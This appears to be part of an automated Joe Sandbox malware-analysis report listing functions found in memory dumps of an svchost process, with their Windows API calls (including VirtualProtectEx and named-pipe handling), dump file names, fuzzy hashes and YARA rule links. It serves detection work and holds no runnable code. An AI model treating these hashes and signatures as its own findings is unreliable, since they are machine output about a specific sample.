Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction Fuzzy Hash: 70810F2AE39A50ACFB529F76FA483BD37A1F755BA4F440512DF0AA3692DB34C441CB10

Function 0000029B92350860 Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0000029B923508A2
GetConsoleMode.KERNEL32 ref: 0000029B92350960
GetLastError.KERNEL32 ref: 0000029B923509EA

Memory Dump Source

Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd

Similarity

API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
String ID:
API String ID: 2210144848-0
Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction ID: 26c1d3d3d4dfc92538e6179a9cbce9eca40d1afe7bcacec6557c3016137259c5
Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction Fuzzy Hash: A681F422E39A40ADFB529F60FA48BAD27A1F74ABB4F440115EF4E63795DB35C441CB10

Function 0000029B923A57F0 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000029B923A5806

Memory Dump Source

Source File: 0000000F.00000002.2640215810.0000029B923A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B923A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b923a0000_svchost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
Instruction ID: 3e6612b992f913f82c9005df87f2ee28d020918f47da2f0ac2c00043a5507f7f
Opcode Fuzzy Hash: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
Instruction Fuzzy Hash: BB619936E2DA84CAF7619B15F59832AB7A4F388764F110125EB8E47BA8DB7CC544CF00

Function 0000029B923457F0 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000029B92345806

Memory Dump Source

Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
Instruction ID: 46b0fc104808f5061891ba78237e60911c68285d664d32210f14aabd36b9600e
Opcode Fuzzy Hash: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
Instruction Fuzzy Hash: 5D619636E2DA84CAFB629B15F55871AB7A0F398764F100156FB8D87BA8DB78C544CF00

Function 0000029B91DE12B8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 0000029B91DE12E0
_set_statfp.LIBCMT ref: 0000029B91DE12FB
_set_statfp.LIBCMT ref: 0000029B91DE1317
_set_statfp.LIBCMT ref: 0000029B91DE1353

Memory Dump Source

Source File: 0000000F.00000002.2635445548.0000029B91DD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B91DD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b91dd0000_svchost.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: 7a1efd6f9115c96823cbc084938d2b144330736117e1befdad690c6f3d907a7a
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: 3211A562B74E110DF7A79169F75E3BE1C817F54376F484628EB7706BDB8B188C42AA00

Function 0000029B923B1EB8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 0000029B923B1EE0
_set_statfp.LIBCMT ref: 0000029B923B1EFB
_set_statfp.LIBCMT ref: 0000029B923B1F17
_set_statfp.LIBCMT ref: 0000029B923B1F53

Memory Dump Source

Source File: 0000000F.00000002.2640215810.0000029B923A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B923A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b923a0000_svchost.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: 876b0d880c9396d1add801eaf825b7ba892b47160a12a33a21b62ffc502531ed
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: ED11822EE7CB0189F7AA1D79F75E37950416BA5374F084724BBF6063DA8B988D42DA00

Function 0000029B92351EB8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 0000029B92351EE0
_set_statfp.LIBCMT ref: 0000029B92351EFB
_set_statfp.LIBCMT ref: 0000029B92351F17
_set_statfp.LIBCMT ref: 0000029B92351F53

Memory Dump Source

Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: 08d54268585fdbafa7090e1ccdde363598429efbd96a497b4c4cdedb1ba71f08
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: C9118222E7CB0149F7AA1169F75EB6950816B75374F094724BBFF073DA8B988C425A00

Function 0000029B923A3878 Relevance: 7.5, APIs: 5, Instructions: 45COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 0000029B923A3886
GetCurrentProcess.KERNEL32 ref: 0000029B923A38B4
VirtualProtectEx.KERNEL32 ref: 0000029B923A38D6
GetCurrentProcess.KERNEL32 ref: 0000029B923A38F4
VirtualProtectEx.KERNEL32 ref: 0000029B923A3915

Memory Dump Source

Source File: 0000000F.00000002.2640215810.0000029B923A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B923A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b923a0000_svchost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction ID: 4a886e9207fa364f303bad0a34f3deb9fb3ad3f0b96814e59e093575315c6af9
Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction Fuzzy Hash: FA112E29F18B5086FB559B61F518369B674FB48BA4F05003ADF8907754EF3DC509CB00

Function 0000029B92343878 Relevance: 7.5, APIs: 5, Instructions: 45COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 0000029B92343886
GetCurrentProcess.KERNEL32 ref: 0000029B923438B4
VirtualProtectEx.KERNEL32 ref: 0000029B923438D6
GetCurrentProcess.KERNEL32 ref: 0000029B923438F4
VirtualProtectEx.KERNEL32 ref: 0000029B92343915

Memory Dump Source

Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction ID: defc2d454db1e8e869f151a17ebd0dfd86ca97b4be6e45acda3a84b5a85f46d2
Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction Fuzzy Hash: F4112E25F18B4086FF569B21F50875966B0FB44BA4F140425DF8D07754EF3DC509CB00

Function 0000029B91DD84F5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000029B91DD8503
_IsNonwritableInCurrentImage.LIBCMT ref: 0000029B91DD8598

Strings

csm, xrefs: 0000029B91DD857E
f, xrefs: 0000029B91DD8516

Memory Dump Source

Source File: 0000000F.00000002.2635445548.0000029B91DD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B91DD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b91dd0000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction ID: 9f062ba64f5f3bb31c96c4e16098646ee305cc945691ba3f121e517d682d653e
Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction Fuzzy Hash: 1051903A7226008EFB27DF15FA48B193795FB44BA8F518124DB4647B88DB34DA41EB24

Function 0000029B91DD84D8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000029B91DD8503
_IsNonwritableInCurrentImage.LIBCMT ref: 0000029B91DD8598

Strings

csm, xrefs: 0000029B91DD857E
f, xrefs: 0000029B91DD8516

Memory Dump Source

Source File: 0000000F.00000002.2635445548.0000029B91DD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B91DD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b91dd0000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction ID: 44643fc7fae871e2db009b70b97542c06cd2de5e433ad7934ee4b76108beecef
Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction Fuzzy Hash: F2318D7A2217409AF727DF11FA48B193BA4FB40BD8F558014EF5A07B88CB38DA41DB14

Function 0000029B923414B4 Relevance: 6.3, APIs: 5, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000029B923414D5
HeapFree.KERNEL32 ref: 0000029B923414E4
GetProcessHeap.KERNEL32 ref: 0000029B923414F0
HeapFree.KERNEL32 ref: 0000029B923414FF
GetProcessHeap.KERNEL32 ref: 0000029B9234152A

Memory Dump Source

Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: 58c4a46a428cd9431a43c23367012082d3a0a44734d7d4b43a30409f6f14bb0b
Instruction ID: f4a707cb475bc8e6ef8e5e626179c24ee6e57d3c3beed6b0476d6a4a34df6572
Opcode Fuzzy Hash: 58c4a46a428cd9431a43c23367012082d3a0a44734d7d4b43a30409f6f14bb0b
Instruction Fuzzy Hash: A3111F31E28F849AFB56AF66B54865AB770F789B94F044015DB8E03B54DF3CC1528B40

Function 0000029B923A26F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 0000029B923A27D4
StrCpyW.SHLWAPI ref: 0000029B923A27ED

Strings

\\.\pipe\, xrefs: 0000029B923A27DF

Memory Dump Source

Source File: 0000000F.00000002.2640215810.0000029B923A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B923A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b923a0000_svchost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction ID: 1d70674bb22af0eea2efe58e9d6c54012ce5ada9e496495a99503cc056f162cf
Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction Fuzzy Hash: 0871A332E2878149F7669F26EB483AAB7A4F745BA4F46003ADF4943B99DF35C5048B40

Function 0000029B923426F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 0000029B923427D4
StrCpyW.SHLWAPI ref: 0000029B923427ED

Strings

\\.\pipe\, xrefs: 0000029B923427DF

Memory Dump Source

Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction ID: 414ca988c487fb73155da2be5319deebbc18a1b76d39225f553441e2a6832cd4
Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction Fuzzy Hash: EB71E232E38B8149FF669F26FA483AE67A0F745BA4F540056DF4953B99DF34C5048B00

Function 0000029B923A24DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 0000029B923A25C3
StrCpyW.SHLWAPI ref: 0000029B923A25DA

Strings

\\.\pipe\, xrefs: 0000029B923A25CE

Memory Dump Source

Source File: 0000000F.00000002.2640215810.0000029B923A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B923A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b923a0000_svchost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction ID: bca2ae18a234ca1af5fec555f184cecc5745655e0ca5998444e56598be94f227
Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction Fuzzy Hash: E151C732E2D78149F7669E2EB75C3AAB651F7857A0F424035CF8A03BA9CB75C8018F40

Function 0000029B923424DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 0000029B923425C3
StrCpyW.SHLWAPI ref: 0000029B923425DA

Strings

\\.\pipe\, xrefs: 0000029B923425CE

Memory Dump Source

Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction ID: 4767eb743787d0acac57021502b6c320e35b019734e55622105f45cdc07771bd
Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction Fuzzy Hash: 0751D932E2C78149FF769E2BB65C36AA651F7857A0F110165DF8A13B99CB79C8018F40

Function 0000029B923B0604 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 0000029B923B071B
GetLastError.KERNEL32 ref: 0000029B923B073D

Strings

U, xrefs: 0000029B923B06C7

Memory Dump Source

Source File: 0000000F.00000002.2640215810.0000029B923A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B923A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b923a0000_svchost.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction ID: 8d1b77503104e348ef112e1c390852a768af9406004dbd544895343cf938cf7c
Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction Fuzzy Hash: BA41B436F29A5099FB219F36F5493A9B7A0F7887A4F404021EF4E87B54DB38C501CB40

Function 0000029B92350604 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 0000029B9235071B
GetLastError.KERNEL32 ref: 0000029B9235073D

Strings

U, xrefs: 0000029B923506C7

Memory Dump Source

Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction ID: c2bbf9029e049bffee44919c2b4fdb4bf3cc90c6fe5f71a35a4d35fb3f419bbb
Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction Fuzzy Hash: 2841A372F29A8099FB219F25F54879AA7A0F7887A4F404025EF8E87798DB3DC541CF40

Function 0000029B923AD6C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 0000029B923AD6F9
LCMapStringW.KERNEL32 ref: 0000029B923AD781

Strings

LCMapStringEx, xrefs: 0000029B923AD6DC, 0000029B923AD6ED

Memory Dump Source

Source File: 0000000F.00000002.2640215810.0000029B923A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B923A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b923a0000_svchost.jbxd

Similarity

API ID: Stringtry_get_function
String ID: LCMapStringEx
API String ID: 2588686239-3893581201
Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction ID: 0293f51d64dbaa5269c64abc09c17d4b466a83feb48d1200df15e6a1e07e2297
Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction Fuzzy Hash: 2C114D36A18B808AEB61DF15F54429AB7A4F7C8B90F54412AEF8D43B19DF38C444CB00

Function 0000029B9234D6C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 0000029B9234D6F9
LCMapStringW.KERNEL32 ref: 0000029B9234D781

Strings

LCMapStringEx, xrefs: 0000029B9234D6DC, 0000029B9234D6ED

Memory Dump Source

Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd

Similarity

API ID: Stringtry_get_function
String ID: LCMapStringEx
API String ID: 2588686239-3893581201
Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction ID: 5a81ab50e6946cda1fd16430c748141510062dac5ee7ca26027533a194b77aa5
Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction Fuzzy Hash: FD113836A1CB808AEB61DF16F54469AB7A0F7C8BA0F544126EF8D83B19DF38C454CB00

Function 0000029B923A94A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 0000029B923A94E8
RaiseException.KERNEL32 ref: 0000029B923A952E

Strings

csm, xrefs: 0000029B923A951B

Memory Dump Source

Source File: 0000000F.00000002.2640215810.0000029B923A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B923A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b923a0000_svchost.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction ID: 4cc212ae7e3ea790dc4a9f42fdc077fbdc1531c1a78d6ff363b1f7a8c2206146
Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction Fuzzy Hash: 47112136A28B8086FB628F15F54435977A5F788BA8F194221DF8D17764DF3CC555CB00

Function 0000029B923494A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 0000029B923494E8
RaiseException.KERNEL32 ref: 0000029B9234952E

Strings

csm, xrefs: 0000029B9234951B

Memory Dump Source

Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction ID: 63dd0cf09de656d245bfd650747a0b6f425ed4c86e9872dd7c13fbebae0dfe19
Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction Fuzzy Hash: F7112E32A28B8086EF628F15F54435977A5F788BA8F584261DF8D07B68DF3CC555CB00

Function 0000029B923AD65C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 0000029B923AD68D
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 0000029B923AD6A7

Strings

InitializeCriticalSectionEx, xrefs: 0000029B923AD681

Memory Dump Source

Source File: 0000000F.00000002.2640215810.0000029B923A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B923A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b923a0000_svchost.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpintry_get_function
String ID: InitializeCriticalSectionEx
API String ID: 539475747-3084827643
Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction ID: afb62c29c7847a69b7f6b41833b908b68943977d3821eebdd8dde6b4262898a8
Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction Fuzzy Hash: CDF0E925F3879485FB076F55F6081A53320AB88BA0F454026AB4903B25CF38C458CF00

Function 0000029B9234D65C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 0000029B9234D68D
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 0000029B9234D6A7

Strings

InitializeCriticalSectionEx, xrefs: 0000029B9234D681

Memory Dump Source

Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpintry_get_function
String ID: InitializeCriticalSectionEx
API String ID: 539475747-3084827643
Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction ID: b1fba158d9aadeab83c15e6daab3c031668e4e334999ca927d87b74943a4301f
Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction Fuzzy Hash: 3FF05421F3C78495FB076B41F6489556361EB88BA0F455015AB5D07B55CF38C559CF00

Function 0000029B91DDCB9C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 0000029B91DDCBC5

Strings

October, xrefs: 0000029B91DDCBBE
November, xrefs: 0000029B91DDCBA8, 0000029B91DDCBB2

Memory Dump Source

Source File: 0000000F.00000002.2635445548.0000029B91DD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B91DD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b91dd0000_svchost.jbxd

Similarity

API ID: try_get_function
String ID: November$October
API String ID: 2742660187-1636048786
Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction ID: 91a7777d55e9c68d980e8430181fc63d48e8dcd95e2a56e62b69fec309374882
Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction Fuzzy Hash: F5E092257205459AFE07DB51F7482E426219F84740F5A5125D72906652CF38C886FB10

Function 0000029B923AD608 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 0000029B923AD631
TlsSetValue.KERNEL32 ref: 0000029B923AD648

Strings

FlsSetValue, xrefs: 0000029B923AD61E

Memory Dump Source

Source File: 0000000F.00000002.2640215810.0000029B923A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B923A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b923a0000_svchost.jbxd

Similarity

API ID: Valuetry_get_function
String ID: FlsSetValue
API String ID: 738293619-3750699315
Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction ID: e9500933f9dbb044619847991382a3e8d18b826e78f83824d7e80daa3c859f0b
Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction Fuzzy Hash: 2CE06565F3864495FB075F64FA0C6A53321ABC87A0F494026D71906255CF38C859CF04

Function 0000029B9234D608 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 0000029B9234D631
TlsSetValue.KERNEL32 ref: 0000029B9234D648

Strings

FlsSetValue, xrefs: 0000029B9234D61E

Memory Dump Source

Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd

Similarity

API ID: Valuetry_get_function
String ID: FlsSetValue
API String ID: 738293619-3750699315
Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction ID: df245448416851ffdf1788cdc81c907b50fec5b4a0f721f170b003bfa5b85828
Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction Fuzzy Hash: CEE06D61E3C64499FF0B5B50FA08AA82362AB88BA0F888022DB0D06255CF38C859CF00

Function 0000029B923A1D60 Relevance: 5.1, APIs: 4, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000029B923A1D9B
HeapAlloc.KERNEL32 ref: 0000029B923A1DAA
GetProcessHeap.KERNEL32 ref: 0000029B923A1E1E
HeapFree.KERNEL32 ref: 0000029B923A1E2C

Memory Dump Source

Source File: 0000000F.00000002.2640215810.0000029B923A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B923A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b923a0000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction ID: 24e952d6facaf0b42332811f8c15580390224ccbb743d0e99c4462c4483d3aa4
Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction Fuzzy Hash: F421A726E18B9089FB529F69F50826AF3A4FB84BA4F054125DFCC47B14EF78C542CB00

Function 0000029B92341D60 Relevance: 5.1, APIs: 4, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000029B92341D9B
HeapAlloc.KERNEL32 ref: 0000029B92341DAA
